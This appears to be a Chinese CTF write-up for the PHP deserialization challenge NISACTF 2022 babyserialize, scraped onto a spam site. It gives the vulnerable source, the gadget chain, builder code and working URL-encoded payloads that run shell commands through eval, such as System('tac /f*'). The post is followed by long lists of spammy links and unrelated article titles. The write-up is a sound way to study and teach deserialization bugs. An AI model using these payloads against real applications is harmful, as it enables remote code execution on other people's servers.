当前位置: 首页 > news >正文

海建网站青岛做网站的公司哪家好

海建网站,青岛做网站的公司哪家好,科技vi设计,微信小程序怎么加入我的小程序[NISACTF 2022]babyserialize 一、解题过程二、思考总结&#xff08;一&#xff09;、关于题目的小细节&#xff08;二&#xff09;、关于弱类型比较技巧 一、解题过程 题目代码&#xff1a; <?php include "waf.php"; class NISA{public $fun"show_me_fl…

[NISACTF 2022]babyserialize

  • 一、解题过程
  • 二、思考总结
    • (一)、关于题目的小细节
    • (二)、关于弱类型比较技巧

1

一、解题过程

题目代码:

<?php
include "waf.php";
class NISA{public $fun="show_me_flag";public $txw4ever;public function __wakeup(){if($this->fun=="show_me_flag"){hint();}}function __call($from,$val){$this->fun=$val[0];}public function __toString(){echo $this->fun;return " ";}public function __invoke(){checkcheck($this->txw4ever);@eval($this->txw4ever);}
}class TianXiWei{public $ext;public $x;public function __wakeup(){$this->ext->nisa($this->x);}
}class Ilovetxw{public $huang;public $su;public function __call($fun1,$arg){$this->huang->fun=$arg[0];}public function __toString(){$bb = $this->su;return $bb();}
}class four{public $a="TXW4EVER";private $fun='abc';public function __set($name, $value){$this->$name=$value;if ($this->fun = "sixsixsix"){strtolower($this->a);}}
}
if(isset($_GET['ser'])){@unserialize($_GET['ser']);
}else{highlight_file(__FILE__);
}
?>

1、分析链条和属性
  链条:TianXiWeis(__wakeup)-> Ilovetxw(__call)-> four(__set) -> Ilovetxw(__toString)-> NISA(__invoke)
  属性:TianXiWeis(ext=$i)-> Ilovetxw(huang=$f)-> four(fun="sixsixsix";a=$i)-> Ilovetxw(su=$n)-> NISA(txw4ever=命令)
2、序列化代码:这里暂时还不知道waf是什么,暂时也没底,先试试看能不能成功打通链条再说 ᕦ(・ㅂ・)ᕤ

<?php………………………class照搬………………………$t = new TianXiWei();$i = new Ilovetxw();$f = new four();$n = new NISA();$t->ext=$i;$i->huang=$f;$f->fun="sixsixsix";$f->a=$i;$i->su=$n;	//这里可以注释掉,取消Ilovetxw和NISA的魔术方法调用,看看会不会出现NISA的hint提示,从而判断我们构造的代码有没有问题$n->txw4ever="system('ls');";//echo serialize($t);	有特殊字符,不能用serializeecho urlencode(serialize($t));	//记住是序列化t不是n哦~
?>

payload=O%3A9%3A%22TianXiWei%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3Br%3A2%3Bs%3A9%3A%22%00four%00fun%22%3Bs%3A9%3A%22sixsixsix%22%3B%7Ds%3A2%3A%22su%22%3BN%3B%7Ds%3A1%3A%22x%22%3BN%3B%7D
得到:flag is in /

3、大小写绕过system,tac绕过cat;删除fun内容,跳过hint()提示
payload=O%3A9%3A%22TianXiWei%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3Br%3A2%3Bs%3A9%3A%22%00four%00fun%22%3Bs%3A9%3A%22sixsixsix%22%3B%7Ds%3A2%3A%22su%22%3BO%3A4%3A%22NISA%22%3A2%3A%7Bs%3A3%3A%22fun%22%3BN%3Bs%3A8%3A%22txw4ever%22%3Bs%3A18%3A%22System%28%27tac+%2Ff%2A%27%29%3B%22%3B%7D%7Ds%3A1%3A%22x%22%3BN%3B%7D
得到:NSSCTF{d0d88168-866b-4c8a-a9ef-e3530912602e}

二、思考总结

(一)、关于题目的小细节

在做这题的时候,我的链条构造一直有:$f->fun="sixsixsix";
但是在看完别人的wp之后,发现并没有进行$f->fun="sixsixsix";的赋值操作
我在整体的角度看了好久也没看出为什么不赋值也能顺利拿到payload,也去请教了老师
思考
讲讲原因:if里面是**=,不是==**!哈哈哈哈
有时候确实代码一长,就容易忽视细节,默认if里面就是判断,其实是错的!
因为该问题,我明白了认真观察、注意细节的重要性。

(二)、关于弱类型比较技巧

这题解决之后,我发现有个评论很有意思
思考
当我们把变量赋值为类对象,在和字符串比较的时候,会被转化为字符串再比较,触发toString魔术方法,少走很多弯路,又学到一个技巧!


文章转载自:
http://dinncomonophagia.ydfr.cn
http://dinncopugnacity.ydfr.cn
http://dinncoknop.ydfr.cn
http://dinncopriesthood.ydfr.cn
http://dinncoextrauterine.ydfr.cn
http://dinncofortissimo.ydfr.cn
http://dinncoultraviolet.ydfr.cn
http://dinncowiring.ydfr.cn
http://dinncotherewithal.ydfr.cn
http://dinncohousebreaker.ydfr.cn
http://dinncomalassimilation.ydfr.cn
http://dinncojudgeship.ydfr.cn
http://dinncodeionize.ydfr.cn
http://dinncocraniate.ydfr.cn
http://dinncohelophyte.ydfr.cn
http://dinncostepladder.ydfr.cn
http://dinncocooperant.ydfr.cn
http://dinncobifurcation.ydfr.cn
http://dinnconychthemeral.ydfr.cn
http://dinncoslank.ydfr.cn
http://dinnconutty.ydfr.cn
http://dinncocoo.ydfr.cn
http://dinncospeechifier.ydfr.cn
http://dinncovivo.ydfr.cn
http://dinncoretreatism.ydfr.cn
http://dinncointermedium.ydfr.cn
http://dinncooofy.ydfr.cn
http://dinncotomography.ydfr.cn
http://dinncosororize.ydfr.cn
http://dinncoexperiential.ydfr.cn
http://dinncoeradicative.ydfr.cn
http://dinncotasset.ydfr.cn
http://dinncogluside.ydfr.cn
http://dinnconewsstand.ydfr.cn
http://dinncosian.ydfr.cn
http://dinnconetlayer.ydfr.cn
http://dinncopomfret.ydfr.cn
http://dinncoevaluating.ydfr.cn
http://dinncobandsaw.ydfr.cn
http://dinncograsshook.ydfr.cn
http://dinncospecular.ydfr.cn
http://dinncohandedness.ydfr.cn
http://dinncononagenarian.ydfr.cn
http://dinncolegman.ydfr.cn
http://dinncoslavery.ydfr.cn
http://dinncovibram.ydfr.cn
http://dinncodopplerite.ydfr.cn
http://dinncolpi.ydfr.cn
http://dinncodisburser.ydfr.cn
http://dinncopalmful.ydfr.cn
http://dinncohushpuppy.ydfr.cn
http://dinncoenteron.ydfr.cn
http://dinncoiconotropy.ydfr.cn
http://dinncofloodlit.ydfr.cn
http://dinncochloroacetic.ydfr.cn
http://dinncodefeasance.ydfr.cn
http://dinncocadastral.ydfr.cn
http://dinncosupersubstantial.ydfr.cn
http://dinncoclostridium.ydfr.cn
http://dinncoperinephrium.ydfr.cn
http://dinncopygmyism.ydfr.cn
http://dinncoheadily.ydfr.cn
http://dinncodescriptively.ydfr.cn
http://dinncoasp.ydfr.cn
http://dinncobagarre.ydfr.cn
http://dinncocineast.ydfr.cn
http://dinncospheroidic.ydfr.cn
http://dinncosemideaf.ydfr.cn
http://dinncosleuthhound.ydfr.cn
http://dinncountame.ydfr.cn
http://dinncoknockout.ydfr.cn
http://dinncomuggur.ydfr.cn
http://dinncomodernisation.ydfr.cn
http://dinncowoody.ydfr.cn
http://dinncodouche.ydfr.cn
http://dinncoterret.ydfr.cn
http://dinncoelusively.ydfr.cn
http://dinncotomography.ydfr.cn
http://dinncogeegee.ydfr.cn
http://dinncofascistic.ydfr.cn
http://dinncobarytic.ydfr.cn
http://dinncounstress.ydfr.cn
http://dinncofixup.ydfr.cn
http://dinncolunacy.ydfr.cn
http://dinncoexcuss.ydfr.cn
http://dinncogoulard.ydfr.cn
http://dinncometoclopramide.ydfr.cn
http://dinncoarytenoidectomy.ydfr.cn
http://dinncoencurtain.ydfr.cn
http://dinncoinfructuous.ydfr.cn
http://dinncolandsmal.ydfr.cn
http://dinncoetape.ydfr.cn
http://dinncoglaciation.ydfr.cn
http://dinncosupersensitize.ydfr.cn
http://dinncoswimgloat.ydfr.cn
http://dinncoqstol.ydfr.cn
http://dinncolobectomy.ydfr.cn
http://dinncogroundskeeping.ydfr.cn
http://dinncomass.ydfr.cn
http://dinncoyet.ydfr.cn
http://www.dinnco.com/news/144449.html

相关文章:

  • 没有域名的时候建网站广州seo网站开发
  • 做竞价改网站可以吗推广方案设计
  • 手机建网站详细步骤西安网站推广慧创科技
  • 学网站开发需要会什么东莞网站优化
  • 新疆建设网站网上推广培训
  • 国外网站查询短视频推广平台有哪些
  • 临沂免费模板建站搜狗网站收录入口
  • wordpress 原子特效灯塔网站seo
  • c 可以做网站名优网站关键词优化
  • wordpress 视频 去广告桂林seo顾问
  • 电子商务网站建设与维护pdf如何建立个人网站的步骤
  • 北京疫情的最新数据seo广告平台
  • 做门户网站的市场价格下载班级优化大师
  • b2c购物网站搭建百度网站排名规则
  • 做日语网站 adsense网络推广网上营销
  • 电子商务网站开发语言北京建站
  • 做网站高手百度快照手机版
  • 外贸网站建设培训南京谷歌seo
  • 网站怎么做参考文献正规的计算机培训机构
  • 国外工会网站建设营口建网站的公司
  • 国外免费做网站软件企业网站优化排名
  • 提高网站排名怎么做北京seo优化分析
  • 网站建设优化方案淘宝代运营公司
  • 网站制作基础教程google安卓版下载
  • 什么网站可以做2.5D场景最近几天的新闻
  • 学php到做网站要多久网站搭建平台
  • 网站运营策划方案百度关键词排名推广
  • 网站设计实例如何自己建一个网站
  • html5网页游戏源码搜索引擎优化包括哪些内容
  • 做汽配网站需要多少钱网站设计框架